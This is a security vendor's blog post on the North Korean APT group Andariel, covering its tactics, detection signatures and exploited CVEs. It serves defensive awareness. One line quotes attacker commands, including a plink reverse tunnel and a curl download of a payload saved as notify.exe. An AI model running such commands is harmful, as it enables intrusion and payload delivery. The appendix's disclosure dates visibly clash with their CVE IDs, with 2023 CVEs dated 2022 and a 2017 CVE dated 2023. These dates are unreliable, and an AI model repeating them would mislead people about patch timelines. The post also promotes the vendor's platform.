On July 25th, 2024, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored North Korean APT group, Andariel [1]. Andariel, also known as Onyx Sleet, is associated with the RGB 3rd Bureau of North Korea and they have previously conducted destructive attacks but have now shifted towards engaging in specialized cyber espionage and ransomware operations.
In this blog post, we explained the tools and techniques used by Andariel and how organizations can defend themselves against the North Korean APT group.
Andariel, also known as Onyx Sleet, is an Advanced Persistent Threat (APT) that has been associated with North Korea's Reconnaissance General Bureau (RGB) based in Pyongyang and Sinuiju. Andariel has been active since 2013, and the group gained infamy with the Sony Pictures hack in 2014.
Andariel's motivations are aligned with the North Korean political agenda and the APT group primarily targets defense, aerospace, nuclear, and engineering organizations for cyber espionage. Additionally, they run ransomware operations against healthcare organizations in the US to fund their operations.
The North Korean APT group utilizes a range of tactics, including spear phishing and vulnerability exploitation against web servers to infiltrate targeted organizations. After the initial foothold, they use known system discovery and enumeration techniques and establish persistence by deploying webshells and scheduled tasks. Adversaries also utilize custom malware, remote access tools (RATs), and open-source tools for lateral movement and data exfiltration.
Andariel uses known and critical vulnerabilities to gain initial access to target networks. Although these vulnerabilities were disclosed with respective patches a long time ago, the unpatched assets still pose significant risks to organizations. The list of exploited vulnerabilities can be seen in the Appendix.
Adversaries abuse native tools and processes such as Windows Command Line, PowerShell, and WMI in compromised systems to execute their malicious actions without raising suspicion. This technique is also called Living-off-the-Land. Some of the example commands are given below.
netstat -naop systeminfo | findstr Logon pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP> curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe |
The North Korean threat actors use VMProtect and Themida to pack their malicious tools. The resulting files often have file section names such as vmp0 and vmp1. This obfuscation technique makes detection and debugging harder for security teams.
Andariel uses publicly available tools such as Mimikatz, ProcDump, and Dumpert to access the Active Directory domain database by targeting NTDS.dit files. After dumping credentials, adversaries crack them offline and obtain clear-text passwords for valid accounts.
Adversaries use a command-line tool called AdFind to gather information from the Active Directory. This tool allows threat actors to get a list of valid accounts, usernames, and email addresses within the compromised network.
The threat actors use a custom .NET tool to enumerate files and directories in the compromised hosts. The tool collects information such as starting path, name, last write time, last access time, creation time, size, and attributes from each drive targeted on the host.
Adversaries use remote services such as telnet, SSH, VNC, RDP, SMB to interact with remote systems. Additionally, compromised valid accounts allows them to move laterally within the compromised network.
Adversaries use the HTTP protocol to blend their C2 activity with the usual network traffic. This technique allows them to appear as benign traffic and evade detection by security controls.
Andariel uses tools like 3Proxy, PLINK, and Stunnel to tunnel their traffic over various protocols from compromised hosts to C2 servers.
Instead of directly communicating with their C2 servers, threat actors use web services and cloud storage services to exfiltrate data from compromised networks.
Andariel uses PuTTY and WinSCP to exfiltrate data to their servers via File Transfer Protocol (FTP).
We also strongly suggest simulating Andariel attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Andariel aka Onyx Sleet:
Threat ID |
Threat Name |
Attack Module |
38883 |
Andariel Threat Group Campaign 2023 |
Windows Endpoint |
56407 |
Andariel Threat Group Campaign Backdoor Malware Download Threat |
Network Infiltration |
41382 |
Andariel Threat Group Campaign Backdoor Malware Email Threat |
Email Infiltration (Phishing) |
76699 |
Andariel Threat Group Campaign Malware Downloader Download Threat |
Network Infiltration |
88521 |
Andariel Threat Group Campaign Ransomware Download Threat |
Network Infiltration |
38855 |
Andariel Threat Group Campaign Ransomware Email Threat |
Email Infiltration (Phishing) |
93568 |
Andariel Threat Group Campaign Malware Downloader Email Threat |
Email Infiltration (Phishing) |
37270 |
Andariel Threat Group Campaign RAT Download Threat |
Network Infiltration |
30592 |
Andariel Threat Group Campaign RAT Email Threat |
Email Infiltration (Phishing) |
76162 |
Lilith RAT Download Threat |
Network Infiltration |
36694 |
Lilith RAT Email Threat |
Email Infiltration (Phishing) |
47956 |
Yamabot RAT Download Threat |
Network Infiltration |
23158 |
Yamabot RAT Email Threat |
Email Infiltration (Phishing) |
33583 |
Atharvan Backdoor Malware Download Threat |
Network Infiltration |
24167 |
Atharvan Backdoor Malware Email Threat |
Email Infiltration (Phishing) |
38967 |
TigerRAT RAT Download Threat |
Network Infiltration |
77704 |
TigerRAT RAT Email Threat |
Email Infiltration (Phishing) |
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Andariel (Onyx Sleet) group in preventive security controls. Currently, Picus Labs validated the following signatures for Andariel APT Group:
Security Control |
Signature ID |
Signature Name |
CheckPoint |
0DA0DE0F0 |
TS_APT.Win32.Lazarus.TC.2b7bkEkG |
CheckPoint |
0C6CB1FF8 |
Trojan.Win32.Ransomware.Win32.Custom.TC.4999V |
CheckPoint |
09A3A83C9 |
Backdoor.Win32.Andariel.TC.f79eWHdC |
CheckPoint |
0AE871AFF |
Backdoor.Win32.Andariel.TC.f7f0Gdlj |
CheckPoint |
08974D9A1 |
TS_APT.Win32.Lazarus.TC.739efHbg |
CheckPoint |
0FCD3CDFF |
Trojan.Win32.Generic.Win32.Generic.TC.f14dLxvv |
CheckPoint |
0F54522EE |
Trojan.Win32.Generic.TC.89abRAvr |
CheckPoint |
0896BA266 |
Trojan.Win32.Imphash.TC.146bNnUc |
CheckPoint |
0D53F5CE5 |
Ransomware.Win32.HelloKitty.TC.2febTLgq |
CheckPoint |
0DDEDEB11 |
HEUR:Trojan.Win32.Mikey.TC.3c83rvQA |
CheckPoint |
09A75653F |
HEUR:Trojan.Win32.Mikey.TC.62aeGoGy |
CheckPoint |
09378C88A |
Trojan.Win32.Imphash.TC.1bd6Kdgd |
CheckPoint |
0B17077B7 |
Backdoor.Win32.TigerRat.TC.3ac2gJvN |
Cisco FirePower |
W32.79E15CC02C-95.SBX.TG |
|
Cisco FirePower |
W32.5C2F339362.in12.Talos |
|
Cisco FirePower |
W32.Auto:1177105e51.in03.Talos |
|
Cisco FirePower |
W32.Auto:b59e8f4482.in03.Talos |
|
Cisco FirePower |
GenericKD:TROJ_GEN-tpd |
|
Cisco FirePower |
TROJ_GEN:TrojanX-tpd |
|
Cisco FirePower |
W32.Auto:8daa6b.in03.Talos |
|
Cisco FirePower |
W32.Auto:3098e6.in03.Talos |
|
Cisco FirePower |
W32.Auto:ce534eb8de.in03.Talos |
|
Cisco FirePower |
W32.Auto:c3c0cf.in03.Talos |
|
Cisco FirePower |
W32.Auto:8b3c8046fa.in03.Talos |
|
Cisco FirePower |
W32.FEC82F2542.in12.Talos |
|
Cisco FirePower |
W32.Auto:4aadf76749.in03.Talos |
|
Cisco FirePower |
W32.868A62FEFF-100.SBX.VIOC |
|
Cisco FirePower |
W32.C2500A6E12.in12.Talos |
|
Cisco FirePower |
W32.9F90670D21.in12.Talos |
|
ForcePoint NGFW |
File_Malware-Blocked |
|
ForcePoint NGFW |
File-OLE_Malicious-Looking-Document |
|
Fortigate AV |
62183 |
PossibleThreat |
Fortigate AV |
6945573 |
Adware/HiddenInstall |
Fortigate AV |
8173658 |
PossibleThreat.MU |
Fortigate AV |
10021613 |
W64/NukeSped.HD!tr |
Fortigate AV |
10125033 |
MSIL/Agent_AGen.AOS!tr |
Fortigate AV |
10003277 |
VBA/Agent.UOE!tr |
Fortigate AV |
8187637 |
W32/AI.Pallas.Suspicious |
Fortigate AV |
10036457 |
W32/Filecoder.OHM!tr |
Palo Alto |
459572261 |
trojan/Win32 EXE.xnet.ae |
Palo Alto |
413328855 |
trojan/Win32 EXE.malware.axun |
Palo Alto |
618815202 |
trojan/Win32.tigerrat.c |
Palo Alto |
602811585 |
trojan/Win32.susgen.apt |
Palo Alto |
459168833 |
trojan/Win32 EXE.xnet.ad |
Palo Alto |
459572168 |
trojan/Win32.nukesped.l |
Palo Alto |
413338881 |
trojan/Win32 EXE.artemis.aixp |
Palo Alto |
615485823 |
trojan/Win32.heur2.en |
Palo Alto |
413245182 |
trojan/MS WORD.valyria.ono |
Palo Alto |
408136170 |
trojan/Win32 EXE.siggen.aat |
Palo Alto |
459168818 |
Program/Win32.multiverze.a |
Palo Alto |
408041781 |
trojan/Win32 EXE.siggen.xl |
Palo Alto |
413246292 |
trojan/Win32 EXE.hiddeninstall.dq |
Palo Alto |
601781334 |
trojan/Win32.andardoor.b |
Palo Alto |
580706583 |
Trojan/Win32.tiggre.vcj |
Palo Alto |
618815202 |
trojan/Win32.tigerrat.c |
Snort |
3.13469.13 |
FILE-OFFICE Microsoft Word ole stream memory corruption attempt |
Snort |
1.2019837.2 |
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
Trellix |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
[1] "North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a
The list below shows known and critical vulnerabilities exploited by Andariel. Using the Picus Security Validation Platform, you can validate your security controls against Andariel's vulnerability exploitation attacks.
Product |
Vulnerability |
CVSS Score |
Disclose Date |
Apache ActiveMQ |
CVE-2023-46604 |
9.8 (Critical) |
15 May 2023 |
JetBrains TeamCity |
CVE-2023-42793 |
9.8 (Critical) |
26 May 2023 |
Citrix NetScaler |
CVE-2023-3519 |
9.8 (Critical) |
24 May 2023 |
Ivanti Endpoint Manager Mobile (EPMM) |
CVE-2023-35078 |
9.8 (Critical) |
24 May 2023 |
Progress MOVEit Transfer |
CVE-2023-34362 |
9.8 (Critical) |
24 May 2023 |
Apache RocketMQ |
CVE-2023-33246 |
9.8 (Critical) |
24 May 2023 |
KeePass |
CVE-2023-32784 |
7.5 (High) |
13 Jun 2023 |
Openfire |
CVE-2023-32315 |
7.5 (High) |
7 Mar 2023 |
Google Chromium V8 Type Confusion |
CVE-2023-3079 |
9.8 (Critical) |
18 Apr 2023 |
Zyxel ZyWALL/USG series firmware |
CVE-2023-28771 |
9.8 (Critical) |
6 Feb 2023 |
Zyxell ATP series firmware |
CVE-2023-33010 |
9.8 (Critical) |
18 Jan 2023 |
Barracuda Email Security Gateway |
CVE-2023-2868 |
9.8 (Critical) |
25 Sep 2022 |
FortiGate SSL VPN |
CVE-2023-27997 |
9.8 (Critical) |
20 Apr 2022 |
Apache HTTP Server |
CVE-2023-25690 |
9.8 (Critical) |
1 Jun 2022 |
Oracle Hospitality Opera 5 |
CVE-2023-21932 |
7.2 (High) |
25 Feb 2022 |
GoAnywhere MFT |
CVE-2023-0669 |
7.2 (High) |
7 Feb 2023 |
Zoho ManageEngine |
CVE-2022-47966 |
9.8 (Critical) |
25 Apr 2022 |
Zimbra Collaboration Suite |
CVE-2022-41352 |
9.8 (Critical) |
4 Apr 2022 |
Zimbra Collaboration Suite |
CVE-2022-27925 |
7.2 (High) |
16 Feb 2022 |
Microsoft Windows Support Diagnostic Tool |
CVE-2022-30190 |
7.8 (High) |
16 Feb 2022 |
TP-LINK TL-WR840N |
CVE-2022-25064 |
9.8 (Critical) |
16 Feb 2022 |
TerraMaster NAS |
CVE-2022-24990 |
7.5 (High) |
1 Apr 2022 |
TerraMaster NAS |
CVE-2021-45837 |
9.8 (Critical) |
3 Mar 2022 |
Moment.js library |
CVE-2022-24785 |
7.5 (High) |
9 Feb 2022 |
PHP Everywhere |
CVE-2022-24665 |
8.8 (High) |
11 Jan 2022 |
PHP Everywhere |
CVE-2022-24664 |
8.8 (High) |
21 Feb 2022 |
PHP Everywhere |
CVE-2022-24663 |
8.8 (High) |
21 Feb 2022 |
Spring MVC and WebFlux |
CVE-2022-22965 |
9.8 (Critical) |
15 Dec 2021 |
Spring Cloud Gateway |
CVE-2022-22947 |
10.0 (Critical) |
15 Dec 2021 |
Microsoft SharePoint Server |
CVE-2022-22005 |
8.8 (High) |
15 Sep 2021 |
Win32k Elevation of Privilege |
CVE-2022-21882 |
7.8 (High) |
5 Oct 2021 |
Apache Log4j |
CVE-2021-44228 |
8.8 (High) |
22 Sep 2021 |
Samba vfs_fruit module |
CVE-2021-44142 |
8.8 (High) |
5 Jan 2021 |
Windows Common Log File System Driver |
CVE-2021-43226 |
7.8 (High) |
8 Dec 2021 |
Windows Common Log File System Driver |
CVE-2021-43207 |
7.8 (High) |
4 Aug 2021 |
Windows Common Log File System Driver |
CVE-2021-36955 |
7.8 (High) |
26 Aug 2019 |
Apache HTTP Server 2.4.49 |
CVE-2021-41773 |
7.5 (High) |
25 Mar 2019 |
Talend ESB Runtime |
CVE-2021-40684 |
9.1 (Critical) |
16 May 2019 |
IPeakCMS 3.5 |
CVE-2021-3018 |
9.8 (Critical) |
5 Jan 2018 |
SMA100 Apache httpd server (SonicWall) |
CVE-2021-20038 |
9.8 (Critical) |
15 May 2023 |
SonicWall Secure Remote Access (SRA) |
CVE-2021-20028 |
9.8 (Critical) |
26 May 2023 |
Tableau Server, Desktop, and Public Desktop |
CVE-2019-15637 |
8.1 (High) |
24 May 2023 |
Kibana |
CVE-2019-7609 |
10.0 (Critical) |
24 May 2023 |
Microsoft Remote Desktop Services |
CVE-2019-0708 |
9.8 (Critical) |
24 May 2023 |
VMware V4H and V4PA |
CVE-2017-4946 |
7.8 (High) |
24 May 2023 |